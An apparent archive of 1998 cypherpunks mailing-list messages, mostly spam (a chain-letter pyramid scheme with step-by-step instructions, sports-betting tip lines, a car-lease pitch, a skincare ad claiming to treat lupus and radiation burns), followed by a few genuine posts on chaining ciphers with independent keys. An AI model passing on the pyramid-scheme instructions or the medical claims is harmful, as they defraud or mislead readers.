[]YES! Sign Me Up For Lifetime Access And Membership 
  To The Warriors Private Site For Only $24.95

[]I am paying by []Credit Card []Check []Money Order.
      (Please Make Payable To: Allen Says)

 Name:______________________________________

 Address:___________________________________

 City:______________________________________

 State:_________________Zip:________________

 Your Email Address:________________________
 
 Dealer Code#:  604

          --------------------------
          Visa\Mastercard Order Form
          --------------------------

 Name On Card:______________________________

 Credit Card#_______________________________

 Exp. Date:_________________________________
    (Charge Will Appear As "Info-World")


        Voice-Mail Order Line: 1-903-832-6067
NOTE: This is a line for leaving your credit card order
on our voice-mail system. Because my dealers bulk email
and a lot of people hate it, we don't answer this phone
"live" anymore.(no person could answer my phone and stay 
sane for very long :-) However, it is very safe to leave 
your Full Name, Credit Card #, The Expiration Date, Your 
Email Address and The Dealer Code#:  604 and I Will Get 
Back To You The Same Day With Your Access To The Site!!

 Speak Slowly and Take As Much Time As You Need!
    You'll Get Your Login Info The Same Day!!
          
     Direct Fax Order Line: 1-903-838-5534
       (Fax your order 24 hours a day!)

Order By Mail:

                 Allen Says
            1311 Old River Road
             Starks, La. 70661
=================================================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pkmrght487@aol.com
Date: Sat, 10 Jan 1998 22:56:56 -0800 (PST)
To: pkmrght090@aol.com
Subject: PRODIGIOUS NFL PICKS
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


<HTML><PRE><BODY BGCOLOR="#000000"><FONT COLOR="#00FFFF" SIZE=3>
     Hello SPORTSFANS!!!!  If you are an avid sportsfan like myself, then I 
know you will enjoy this ad.  Who are we?  We are Prodigious Picks and
Associates.  What are we?  We are one of the BEST sports handicapping
systems in the country.  Our predictions are decided  by a consensus 
analysis system that takes the predictions of SEVEN OF THE BEST
HANDICAPPERS IN THE COUNTRY!!!!  If you are one of the thousands 
of callers that has phoned us in the past weeks, we know that we have 
already proven ourselves to YOU.  If you have not had a chance to give 
us a call yet, we want to inform you that we went 19-6 by the line in the past
two weeks.  That is 76 PERCENT!!!  This includes winning 10 of 12 BIG PICKS
and going 6-2 in the NFL playoffs.  For this reason, we feel extremely confident
that we have the two winning picks for Sunday's championship games that
features DENVER at PITTSBURGH and GREEN BAY at SAN FRANCISCO. 
We are so sure of our predictions that we are calling them the TWO BIGGEST
PICKS OF THE YEAR!!!  Don't lose your money trying to pick the games 
yourself or by even calling some other handicapper whose price per call is 
much more expensive than ours.  Let us do the work and you get the MONEY!  
So give us a call after Friday and WE WILL DELIVER!!!!!!!!  

                                                   1-900-773-9777
                                                   Only $10 per call   
                                                  Must be 18 or older
P.S.   After you WIN 1000s on Sunday, give us a call on Monday for our
         winning basketball picks.  We will also have the winning SUPER
         BOWL PICK after January 22.
		       

                                         

 


</FONT><FONT  COLOR="#000000" SIZE=3>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: TKettle@juno.com
Date: Sun, 18 Jan 1998 17:03:02 -0800 (PST)
To: Friend@public.com
Subject: College Financing
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain



To whomever it may concern:

I am trying desperately to raise money for college. I have applied for numerous grants and
loans to no avail. This is my last chance. I will not burden you with the entire explanation
of my shortcomings. A friend of mine bought this e-mailer for me in the hopes that it works.
His plan is this: If I send a request for one dollar to millions of people, knowing that only
about 10% of you will actually read it and maybe 1/10th of those who read it will send me a
dollar, I might get enough to sustain my studies for a few years. It does not make me happy to
request alms, but I truly see no other alternatives.

     Those of you who wish to send me a single dollar may send it to the address listed below.
Nothing else will be sent by me to your account. This is not a mailing list. Those with
questions may reach me at Tkettle@Juno.com. Thank you for your time and patience.

Sincerely,

Thomas Kenneth Wootten
24 Victoria Drive
South Burlington, VT
05403






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: TKettle@juno.com
Date: Sun, 18 Jan 1998 20:51:04 -0800 (PST)
To: Friend@public.com
Subject: College Financing
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain



To whomever it may concern:

I am trying desperately to raise money for college. I have applied for numerous grants and
loans to no avail. This is my last chance. I will not burden you with the entire explanation
of my shortcomings. A friend of mine bought this e-mailer for me in the hopes that it works.
His plan is this: If I send a request for one dollar to millions of people, knowing that only
about 10% of you will actually read it and maybe 1/10th of those who read it will send me a
dollar, I might get enough to sustain my studies for a few years. It does not make me happy to
request alms, but I truly see no other alternatives.

     Those of you who wish to send me a single dollar may send it to the address listed below.
Nothing else will be sent by me to your account. This is not a mailing list. Those with
questions may reach me at Tkettle@Juno.com. Thank you for your time and patience.

Sincerely,

Thomas Kenneth Wootten
24 Victoria Drive
South Burlington, VT
05403






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 59528925@aol.com
Date: Fri, 23 Jan 1998 00:29:44 -0800 (PST)
To: It'sTheLease@WeCanDo.com
Subject: NEED A BRAND NEW CAR???
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


<HTML><PRE><BODY BGCOLOR="#ffff00"></P><P ALIGN=CENTER><FONT  COLOR="#8000ff" SIZE=4><U><B><I>
</FONT><FONT  COLOR="#0080c0" BACK="#ffff00" SIZE=4>CAN YOU IMAGINE DRIVING THE CAR OF YOUR DREAMS!!!</FONT></FONT><FONT  COLOR="#000000" BACK="#FFFFFF" SIZE=3></U></B></I>
</P><P ALIGN=LEFT>
</P><P ALIGN=CENTER><FONT  COLOR="#000000" SIZE=4><B><I>Introducing The Deal Of The Decade!!
Where Your Dream Car Is Now A Reality!!<FONT  COLOR="#000000" SIZE=3></I>

For a ZERO($0.00) Down Payment....

And just $100 Per/Month.....
<FONT  COLOR="#000000" BACK="#ff0000" SIZE=3><I>($395 Yearly Membership Fee)</FONT><FONT  COLOR="#000000" BACK="#FFFFFF" SIZE=3></B></I>
</P><P ALIGN=LEFT>
</P><P ALIGN=CENTER><B>You Can Drive Away In A Brand New Car 
Of Your Dreams Ranging In Price From $12,000....
 
<FONT  COLOR="#000000" SIZE=4>To As High As $350,000 or More!!!<FONT  COLOR="#000000" SIZE=3>

<FONT  COLOR="#000000" BACK="#8080ff" SIZE=4><I>*** Does A Convertible Bentley Rolls Royce Ring A Bell!!!***

</FONT><FONT  COLOR="#000000" BACK="#ffff00" SIZE=3>************************************************************************************************
<FONT  COLOR="#000000" SIZE=4>***BELIEVE IT OR NOT THE SKY IS NOT THE ONLY LIMIT***<FONT  COLOR="#000000" SIZE=3>
*****************************************************************************************</FONT><FONT  COLOR="#8000ff" BACK="#FFFFFF" SIZE=3></I>
</FONT><FONT  COLOR="#000000" SIZE=3>
No Matter What Make or Model You Choose 
For Your Brand New Dream Car....

<FONT  COLOR="#ff0000" SIZE=3>=========================================
***I REPEAT**I REPEAT***I REPEAT***I REPEAT***
=========================================</FONT><FONT  COLOR="#000000" SIZE=3>

YOUR DOWN PAYMENT WILL STILL BE ZERO($0.00)!!!

YOUR MONTHLY PAYMENT WILL STILL BE ONLY $100!!!
<FONT  COLOR="#000000" BACK="#ff0000" SIZE=3><I>($395 Yearly Membership Fee)</FONT><FONT  COLOR="#000000" BACK="#FFFFFF" SIZE=3></I>


<FONT  COLOR="#ff0000" SIZE=3>NO Capitalized cost reduction.   NO hassle with car salesmen.
NO bank "acquisition" fees.        NO balloon payments.
NO security deposit.                    NO hidden fees.
NO gimmicks.                              NO MLM crap.
95% Approval, regardless of past credit history.</FONT><FONT  COLOR="#000000" SIZE=3>


<FONT  COLOR="#000000" SIZE=5>If this sound like an Unbelievable Dream.....
<FONT  COLOR="#000000" SIZE=4>
<FONT  COLOR="#0000ff" SIZE=5><I>Wake Up And Smell The Coffee!!!</FONT><FONT  COLOR="#000000" SIZE=4></I>

Because that Unbelievable Dream Is Now Coming True!! :o)


<FONT  COLOR="#008000" SIZE=6>Call (714) 957-3417</FONT><FONT  COLOR="#000000" SIZE=4>
	

</B>Click Here To Be Removed......<B><I>

And I Guess You Will Continue To Keep On Dreaming :o(
<FONT  COLOR="#000000" SIZE=3>

<FONT  COLOR="#8000ff" SIZE=4>P.S. Good Things Comes To Those Who Wait!!!</FONT><FONT  COLOR="#000000" SIZE=3></I>

     <FONT  COLOR="#ff0000" SIZE=4><U>BUT NOT TO THOSE WHO WAIT TOO LONG!!!</FONT><FONT  COLOR="#000000" SIZE=3></U>
</B>
</P><P ALIGN=LEFT>












































































































































<FONT  COLOR="#000000" SIZE=3>
</PRE></HTML>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 0000000@hotmail.com
Date: Fri, 23 Jan 1998 21:09:04 -0800 (PST)
To: Everyone@the.net
Subject: Free Internet Service
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


Fellow Networker,

               WE WILL EITHER FIND A WAY OR MAKE ONE."   
                     - HANNIBAL

            " AS YOU SOW, SO SHALL YOU REAP"
                      - MARK 9-23

Stop the Pornography

A Brand-New Family Friendly ISP is now
 in Pre-Launch!  This ISP Blocks the pornographic Emails and sites.

Get your Free Self-Replicating Web Page now to hold your 
position close to the top!


<A HREF="mailto:freeinternet@usmc.net?subject=isp">
CLICK HERE TO GET MORE INFO. !!! </A> Please put isp as subject

<A HREF="mailto:freeinternet@usmc.net?subject=REMOVE">
CLICK TO BE REMOVED FROM OUR LIST </A> Please put remove as subject

Refer 5 friends and you monthly service is free

Looking forward to welcoming you aboard!

Sincerely,

 Frank
 IQI





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pkmrght193@aol.com
Date: Sat, 24 Jan 1998 11:46:44 -0800 (PST)
To: pkmrght193@aol.com
Subject: SUPER BOWL XXXII PICK
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


<HTML><PRE><BODY BGCOLOR="#000000"><FONT COLOR="#00FFFF" SIZE=3>
    Hello SPORTS FANS!!!!  Wouldn't it feel really great to know exactly
who was going to win Sunday's SUPER BOWL match-up between the
Green Bay Packers and the Denver Broncos?  If you are an avid 
sports fan like myself, then I know you will enjoy this ad.  We are 
Prodigious Picks and Associates and we have created the best system
for picking sports games.  We decide our picks by using a consensus 
analysis system that takes the picks of SEVEN OF THE BEST 
HANDICAPPERS IN THE COUNTRY!!!!  If you are one of the hundreds
of callers that has given us a call in the past few weeks, we know that
we have already proven ourselves to YOU.  If you have not had a chance
to give us a call yet, we want to inform you that we went 33-16 by the line
in the past three weeks.  This includes going 7-2-1 in the NFL PLAYOFFS.
Don't lose your money trying to pick the game yourself or by even calling 
some other handicapper whose price per call is much more expensive
than ours.  Let us do the work and you get the MONEY!  So give us a call
this weekend and WE WILL DELIVER THE WINNING PICK FOR
SUPER BOWL XXXII!!!  
                                                  
                                                    1-900-773-9777
                                                   Only $10 per call   
                                                  Must be 18 or older
P.S.   After you take the bank on Super Bowl Sunday, give us a call
         after 4:00 P.M EST on Monday for TWO winning basketball
         picks.

                                         

 


</FONT><FONT  COLOR="#000000" SIZE=3>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: info@mda.net
Date: Fri, 30 Jan 1998 00:29:49 -0800 (PST)
To: Friend@public.com
Subject: PRO2H PRODUCTS - NATURAL SKIN WEAR
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


///////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////
IF YOU WISH TO BE REMOVED FROM THE MAILING LIST
PLEASE E-MAIL TO:  remove@mda.net AND PUT REMOVE 
IN THE SUBJECT HEADER.  THANK YOU.////////////////
/////////////////////////////////////////////////////////

	PRO 2H PRODUCTS


	NATURAL SKIN WEAR - 100% MONEY BACK GUARANTEE!!!


SKINWEAR:The Hottest Ingredients, The Latest Technology Let Pro 2H 


Products introduce you to a world of new product innovations that have 


enjoyed immediate commercial success.  Pro 2H proudly introduces 


SKINWEAR - a high performance, botanical skincare line that blends the
hottest ingredients with the latest technology.  These are products that
address the needs of today's cosmetic buyer by providing product choices
to help counteract the effects of sun damage, aging, pollution, wind,
severe temperatures and much, much, more.
		ENVIRONMENTALLY RESPONSIBLE
In today's rapidly changing world, we are confronted with the challenge
of balancing creativity and environmental responsibility.  Pro 2H Product's
environmental stance has sparked the development of product innovations
that will help meet tomorrow's environmental goals head on.  Use of recyclable
containers, natural ingredients and the continuing committment by our staff 
never to test on animals are just a few of the environmentallysound programs
we are committed to.  
We are known throughout the industry for our integrity, reliability and product 
superiority.  We deliver products and services that meet the changing needs of 
our customers, that is what gives us a distinct advantage over our competitors.
Now more than ever, we've got what it takes to help achieve beautiful, radiant, 
younger-looking skin.


INTRODUCING........Pro ALPHA H2


Pro ALPHA H2 is a scientific breakthrough formula containing a combination of 
ALPHA HYDROXY Fruit Acids including Glycolic Acid-derived from apples,sugar 
cane and citrus. Green Tea Leaves Extract helps to reduce irritation associated with 
Alpha Hydroxy Acids.  This natural fruit acid complex works with your skin's natural renewal processes to help achieve healthier, younger



looking skin.

		COMMON USES:


*  Sun Damaged Skin		*  Age Spots

*  Uneven Pigmentation		*  Blemishes
*  Premature Aging		*  Wrinkles


*  Rough Dry Patches		*  Smooth Fine Lines
	THE BEAUTY OF ALPHA H2


*This natural fruit acid complex works with your natural process to help
achieve healthier, younger-looking skin.


*Green Tea Leaves Extract helps to reduce irritation associated with Alpha Hydroxy


*Helps increase skin's own ability to absorb and retain moisture.
*Promotes natural exfoliation by removing dry, lifeless cells from skin's outer layer.
*Helps protect new healthy skin cells against free radical and damaging environmental effects.


*Retexturize - increaing clarity, firmness, elasticity and evenness in skin tone.


*Leaves skin feeling clean, freah, and healthy.


*Absorbs quickley with no greasy residue.


	INTRODUCING PRO BEMA 2H


Pro BEMA2H is a new blend of natural botanical ingredients and contains the 


world's most effective Aloe Vera extract.


TREATS:


*  Acne		*  Abrasions		*  Athlete's Foot


*  Allergic Rash	*  Burns			*  Bed Sores


*  Bee Stings	*  Bruises		*  Blisters


*  Boils		*  Chapped Skin	*  Chapped Lips


*  Cradle Cap	*  Chemical Peel	*  Diaper Rash


*  Dermabrassion*  Dermatitis		*  Dry Skin


*  Eczema	*  Flea Bites		*  Fungus


*  Fever Blisters	*  Hives			*  Insect Bites
*  Itching	*  Impetigo		*  Jock Itch


*  Keratosis	*  Lupus		*  Psoriasis


*  Poison Ivy	*  Poison Oak		*  Razor Burns


*  Rashes	*  Radiation		*  Rosacea


*  Shingles	*  Burns		*  Stretch Marks


*  Sunburn	*  Wind Burns	*  Very Dry Skin


*  Stops itching caused by poison oak, poison ivy, insect bites and rashes.
*  Instantly stops pain from cuts, scrapes, burns and sunburn, without peeling.
*  Heals athlete's foot and other fungus.
*  16 Hour moisturizer.
*  Excellent skin softener, it protects against environmental pollutants.


*  Helps guard against the effects of exposure to sun and wind.


*  Great for baby's skin for rashes, dry patches.
REVOLUTIONARY NEW FORMULA


Aloe Vera Skin Healing Creme
Never before has there been a more complete combination of ingredients along with a
16 hour moisturizer as in ProBema 2H without the use of dyes, water, mineral oil, 
cortisone creams, steroids, animal by-products and absolutely no animal testing.  The 
Aloe Vera used in ProBema 2H is Barbadensis Millers Aloe from the island of Barbados.
This is the strongest and most effective aloe vera in the world.
		NEW!	NEW!	NEW!	


	ProGel AH2  BIOBATH and SHOWER GEL


Alpha Hydroxy Skin Softeneing Complex and Vitamin Beads an ultra mild body 
treatment that cleanses and moisturizes without the drying effects of soap.  Enhanced
with Aloe Vera Gel and Panthenol to add moisture.  Golden beads of vitamins A and E
to condition and help increase skin's elasticity and suppleness.  Enhanced with 
invigorating, aromathreapy botanicals and Alpha Hydroxy Complex to leave your body
silky, refreshed, and revitalized. ph balanced.
	*  Soap-free, non-drying formula
	*  Contains Alpha Hydroxy-based skin softeneing complex


	*  Refreshing aromatic fragrance


KEY INGREDIENTS:  Vitamin A and E Beads, Alpha Hydroxy based skin softening 
complex, Panthenol, Aloe Vera Gel, Aromatherapy Botanical Extracts of Peach, 
Passion Fruit, Apricot and Mango.
METHOD OF USE: 


In the Shower:  Lather on moist skin, or apply to damp wash cloth, sponge or loofah,
massage and rinse. For the Bath:  Pour under warm running water for a luxurious, 
scented bubble bath.
	100% MONEY BACK GUARANTEE!!!


IF FOR ANY REASON YOU ARE NOT SATISFIED WITH OUR PRODUCTS, RETURN
THE UNUSED PORTION WITHIN 30 DAYS AND WE WILL GLADLY REFUND YOUR
MONEY.

For More Information visit our site at:	http://www.mda.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: action@psp.ink
Date: Fri, 30 Jan 1998 20:45:28 -0800 (PST)
To: Friend@public.com
Subject: Success Magazine - over 100 yrs.
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


New! From ATA Publications:

Now you can get in on the ground floor selling Success Magazine and Entrepreneur Magazine, two well known and well respected business publications.

Now you can earn over $100,000 this year selling products that everybody wants. It will be so simple!

Incredibly low investment, under $45!!! GET IN NOW!!!

4x7 Progressive Matrix pays over $100,000.

NEW  Jan.20,1998!!!!

For more info call: 800-338-1349





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: majordomo@hk.super.net
Date: Sun, 1 Feb 1998 00:00:30 -0800 (PST)
To: Friend@public.com
Subject: RE: THE INFORMATION YOU REQUESTED
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


<HTML><PRE><BODY BGCOLOR="#000000"><FONT COLOR="#00FFFF" SIZE=3>
Hi,

About three times a week I go in and delete numerous junk e-mails from my
mailbox. Recently I decided I was going try one of these MLM "scams" just to see what would happen.  I am glad I did!!  In three weeks I have brought in $11,625, and the money keeps coming in.  I urge you to try this!!  

I have removed all of of "testimonial" text from this letter to make room for my own. 
The main thing is to read and understand the "how to part".  I have discovered a few secrets to making this thing really work, the most important being VOLUME.  The more e-mails you send out the higher % of success you will have.  

Everything below this line is what was sent to me.

                          *** Print This Now For Future Reference ***
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$                       
         PRINT this letter, read the program...  THEN READ IT AGAIN !!!
This is a legitimate LEGAL money-making opportunity.  It does not require you to come 
in contact with people, do any hard work, and best of all, you never have to leave the
house, except to get the mail.  

This electronic multi-level marketing program works perfectly...100% EVERY TIME! 

             ----------------------------------------------------------------------------------
                        OVERVIEW OF THIS EXTRAORDINARY 
              ELECTRONIC MULTI-LEVEL MARKETING PROGRAM
             ----------------------------------------------------------------------------------
The products in this program are a series of four business and financial reports costing
$5.00 each.  Each $5.00 order you receive from someone via "snail mail" will include:

  * $5.00 cash
  * The name of the report that they are ordering
  * The e-mail address of the buyer so that you can e-mail them the 
    report that they ordered.

To fill each order, you simply e-mail the product to the buyer.  THAT'S IT!... the $5.00
is yours! This is the GREATEST electronic multi-level marketing business anywhere! 

                           FOLLOW THE INSTRUCTIONS EXACTLY!
    
                         ******* I  N  S  T  R  U  C  T  I  O  N  S *******

This is what you MUST do:

1. Order all 4 reports shown on the list below.  
     
     *  For each report send $5.00 CASH, YOUR E-MAIL ADDRESS and YOUR
        RETURN POSTAL ADDRESS (in case of a problem) to the person whose 
        name appears on the list next to the report.
  
     *  When you place your order, make sure you order each of the four
        reports.  You will need all four reports so that you can save them
        to your computer and resell them.

2.  IMPORTANT-- DO NOT alter the names of the people who are listed next 
    to each report, or their sequence on the list, in any way other that is
    instructed below in steps "a" through "d" or you will not profit from this
    program the way you should.

    a.  Look below for the listing of available reports.

    b.  Replace the name and address under REPORT #1 with yours, moving
         the one that was there down to REPORT #2.  

    c.  Move the name and address under REPORT #2 to REPORT #3.  

    d.  Move the name and address under REPORT #3 to REPORT #4.  

    e.  The name and address that was under REPORT #4 is dropped off the 
         list and is NO DOUBT on the way to the bank.

    Please make certain you copy everyone's name and address
                            ACCURATELY!!!

3.  Take this entire letter, including the modified list of names, and save 
     it to your computer.

            ALWAYS PROVIDE SAME-DAY SERVICE ON ALL ORDERS!!! 
                            
          ***Order each REPORT by NUMBER and NAME***

Note 1:
ALWAYS SEND $5 CASH (and make sure that it is very well Concealed, wrap it in several layers of paper) FOR EACH REPORT. BE SURE TO REQUEST EACH SPECIFIC REPORT BY NAME AND NUMBER.

Note 2: 
ALWAYS SEND YOUR ORDER VIA FIRST CLASS  MAIL AND BE SURE TO PROVIDE YOUR E-MAIL ADDRESS
FOR QUICK DELIVERY.
_________________________________________________________________
REPORT #1 
"HOW TO MAKE $250,000 THROUGH MULTI-LEVEL SALES" 
ORDER REPORT #1 FROM:  

F & F ENTERPRISES
7708 ARGONAUT ST.
SEVERN, MD   21144
___________________________________________________________________
REPORT #2
"MAJOR CORPORATIONS AND MULTI-LEVEL SALES"
ORDER REPORT #2 FROM:

SSB MARKETING
641 NW 2nd AVENUE
WILLISTON, FL   32696
__________________________________________________________________
REPORT #3 
"SOURCES FOR THE BEST MAILING LISTS"
ORDER REPORT #3 FROM:

P.D. BERNARD
13120 NE 120th LN C-202
KIRKLAND, WA 98034
________________________________________________________________
REPORT #4 
"EVALUATING MULTI-LEVEL SALES PLANS"
ORDER REPORT #4 FROM:

MVPNOVS
1206 W 212th STREET
TORRANCE, CA 90502
_____________________________________________________________________
         --------------------------------------------------------------------------------------------------
         HERE'S HOW THIS AMAZING PLAN WILL MAKE YOU $MONEY$
         --------------------------------------------------------------------------------------------------
Let's say you decide to start small just to see how it goes. Assume your goal is to get
10 people to participate on your first level. (Placing a lot of FREE ads on the internet
could EASILY get a better response.) Also assume that everyone else in YOUR BUILDING ORGANIZATION gets ONLY 10 downline members.  Follow this example for the STAGGERING results below.

1st level--your 10 members with $5......................................$50
2nd level--10 members from those 10 ($5 x 100).................$500
3rd level--10 members from those 100 ($5 x 1,000)...........$5,000
4th level--10 members from those 1,000 ($5 x 10,000).....$50,000
                                                   THIS TOTALS-----------> $55,550
                                          
                            *******TIPS FOR SUCCESS*******

 *  Send for the four reports IMMEDIATELY so you will have them when 
    the orders start coming in because:

 *  When you receive a $5 order, you MUST send out the requested
    product/report to comply with the U.S. Postal & Lottery Laws, Title
    18,Sections 1302 and 1341 or Title 18,  Section 3005 in the U.S. Code,
    also Code of Federal Regs. vol. 16, Sections 255 and 436, which state 
    that "a product or service must be exchanged for money received."

 *  ALWAYS PROVIDE SAME-DAY SERVICE ON THE ORDERS YOU RECEIVE.

                          *******YOUR SUCCESS GUIDELINE*******

You MUST receive 10 to 20 orders for REPORT #1!  THIS IS A MUST!  If you don't within two weeks, advertise more and send out more programs until you do.  Then, a couple of weeks later you should receive at least 100 orders for REPORT #2.  If you don't, advertise more and send out more programs until you do.  Once you have received 100, or more orders for REPORT #2, YOU CAN RELAX, because you will be on your way to the BANK! -OR-  You can DOUBLE your efforts!

REMEMBER: Every time your name is moved down on the list you are placed
                    in front of a DIFFERENT report.  You can KEEP TRACK of your
                    PROGRESS by watching which report people are ordering from
                    you. 
                                                IT'S THAT EASY!!!




    

</FONT><FONT  COLOR="#000000" SIZE=3>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John Kelsey" <kelsey@plnet.net>
Date: Sun, 1 Feb 1998 15:11:34 +0800
To: "cypherpunks" <cypherpunks@Algebra.COM>
Subject: Re: Chaining ciphers
Message-ID: <199802010705.BAA20059@email.plnet.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

[ To: Cypherpunks ## Date: 01/30/98 ##
  Subject: Re: Chaining ciphers ]

>Date: Thu, 29 Jan 98 09:47:52 PST
>From: jim@mentat.com (Jim Gillogly)
>Subject: Re: Chaining ciphers

>Yes, that's definitely better for high-confidence long-term
>archival stuff than relying on one cipher.  Carl Ellison's
>suggestion was DES | tran | nDES | tran | DES, where "tran"
>is an unkeyed large-block transposition.

I believe Dave Wagner broke this, and posted his attack to
cypherpunks, a few months ago; if I recall correctly, his
attack reduced the final security of this to that of a
little more than one DES operation.  (The attack worked when
n=1.)  This reenforces what we already knew:  When you chain
multiple encryption algorithms, you can prove that your
result is no *weaker* than any one of those algorithms, but
that doesn't mean it's any *stronger* than the strongest of
them.

>	Jim Gillogly
>	Trewesday, 8 Solmath S.R. 1998, 17:22
>	12.19.4.15.18, 9 Edznab 16 Muan, Third Lord of Night

- --John Kelsey, kelsey@counterpane.com / kelsey@plnet.net
NEW PGP print =  5D91 6F57 2646 83F9 6D7F 9C87 886D 88AF

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBNNQz8yZv+/Ry/LrBAQGuAQP/fbUH4GeY5MJ9McLcgt6siGofTd9ZskYz
vl1DBVv3TNbOhdoSU4MH8OesCxckc+7vHbBHawxP/FzeDysAGrtVnjvAsyKKglAL
aIVQp3qQlCpbtEgKj9z5AZZbilipnpB+/2X6BSaradfreCRUk7N6sKcigITD2HSE
KREbqrftNK4=
=wWQS
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John Kelsey" <kelsey@plnet.net>
Date: Mon, 2 Feb 1998 06:47:30 +0800
To: "cypherpunks" <cypherpunks@Algebra.COM>
Subject: Re: Chaining ciphers
Message-ID: <199802012242.QAA31781@email.plnet.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

[ To: Cypherpunks ## Date: 02/01/98 ##
  Subject: Re: Chaining ciphers ]

>Subject:      Re: Chaining ciphers
>From:         ghio@temp0201.myriad.ml.org (Matthew Ghio)
>Date:         1998/01/30

>One other possibility is to encrypt with plaintext block
>chaining, then superencrypt it PBC in reverse order,
>starting with the last block first. An attacker would thus
>have to decrypt the entire message before knowing whether
>the key was correct or not.

I've seen proposals along these lines before (I think there
was one by Ron Rivest).  If you have a hash function and any
symmetric cipher, you can do this.  BEAR and LION, the two
arbitrary-size block cipher constructions by Ross Anderson
and Eli Biham, have this property; you have to process every
bit of the message to check a key guess.  Using normal
chaining modes for this kind of thing, at least with 64-bit
block ciphers, usually exposes you to internal-collision
kinds of attacks.

>> One word of caution (which should be obvious, but can't
>> hurt to repeat it): if you chain ciphers (e.g. DES | IDEA |
>> 3DES | CAST | Blowfish), be sure to use separate keys for
>> each of them; otherwise breaking the last one will give the
>> key to the whole lot.

>Only if the cryptanalyst knows that the decryption of the
>last one was correct, which shouldn't be possible without
>also decrypting all the other layers.

Actually, this isn't necessarily true.  The problem is that
you can't guarantee that there won't be some interaction
between those encryption operations unless you can assume
independent keys.  The classic example is this:  Suppose the
first cipher is double-DES encryption with DES keys (K0,K1),
and the second and third encryptions are single-DES
decryptions with keys K1 and K0, respectively.  You now have

e_0(e_1(e_2(x)))

leaking all your plaintext directly.

The proof for why something like

E(X) = IDEA_{K_0}(3DES_{K_1}(X))

is at least as secure as 3DES is as follows:  Suppose those
keys are random and independent, and suppose you have a way
to break E(X).  Now, anytime you see a 3DES-encrypted block
of data, you can break it, as well, by simply choosing a
random IDEA key, encrypting it under that key, and then
applying your attack on E(X).  In other words, the attack on
E(X) implies the attack on 3DES(X), but only if the keys are
independent.  If there is some dependency between K_0 and
K_1 that's required for your attack on E(X), then you can't
generalize that out to an attack on 3DES, since you don't
know the 3DES key when you start attacking it.

To take this a little further, note that an attack on E(X)
also implies a chosen-plaintext attack on IDEA.  If I have
an attack that allows me to break E(X), then I can choose a
random 3DES key, pre-encrypt all my chosen plaintexts with
it, and then request the encryption of all those plaintexts
under the secret IDEA key.  The result is E(X), so I can now
apply my attack to E(X).

For more elaborate constructions, like

E3(X) = 3DES_{K_1}(IDEA_{K_2}(Blowfish_{K_3}(X))),

we can make the same kind of proof.  Suppose I can break
E3(X).  Now, I can mount a chosen-plaintext attack on IDEA.
I select a random encryption key and use it to encrypt all
my chosen plaintexts under with Blowfish, and then I request
their encryptions.  When I get the ciphertexts from that, I
select a random 3DES key and encrypt them again.  I then
apply my attack on E3(X) to break the system.  Thus, an
attack on E3(X) implies an attack on 3DES, IDEA, *and*
Blowfish.  But only if the keys are independent and random.

Note:  I read CP-LITE instead of the whole list.  Please CC
       me on replies.

- --John Kelsey, kelsey@counterpane.com / kelsey@plnet.net
NEW PGP print =  5D91 6F57 2646 83F9 6D7F 9C87 886D 88AF

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBNNRSUiZv+/Ry/LrBAQGTgAP9EhO0wyPT0HKSXqZD61YPwId8E5C4GJK2
c/+27LBZy8WLhiD92NBc42Rzjbxbir8oWlPkSkZa565mYoaILM0CcP7S15ECyfBY
yV2yCOlJdoUo2ea70uIucowxpc2zx2G2KPKBLmGS5P5cwNsx8h3i7KDiRfcWSIGN
Omqf38rAy6E=
=+f39
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Sun, 1 Feb 1998 22:38:47 +0800
To: cypherpunks@Algebra.COM
Subject: Need electron microscope
Message-ID: <3.0.2.32.19980201063304.0077ac4c@netcom10.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



I need access to an electron microscope, or better yet, a real chip
analysis lab. This is for a serious project that would result in a
scientific paper. Who can help?

Thanks,


-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred

   "I do believe that where there is a choice only between cowardice and
    violence, I would advise violence." Mahatma Gandhi





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sun, 1 Feb 1998 22:37:59 +0800
To: cypherpunks@cyberpass.net
Subject: "Cathedral and Bazzar" meeting with Silicon Valley CEO's
Message-ID: <v04003a22b0fa31d58664@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Resent-Date: Sat, 31 Jan 1998 12:26:44 -0500
From: glen@substance.abuse.blackdown.org
To: 0xdeadbeef@substance.abuse.blackdown.org
Cc: bostic@bsdi.com
Subject: "Cathedral and Bazzar" meeting with Silicon Valley CEO's
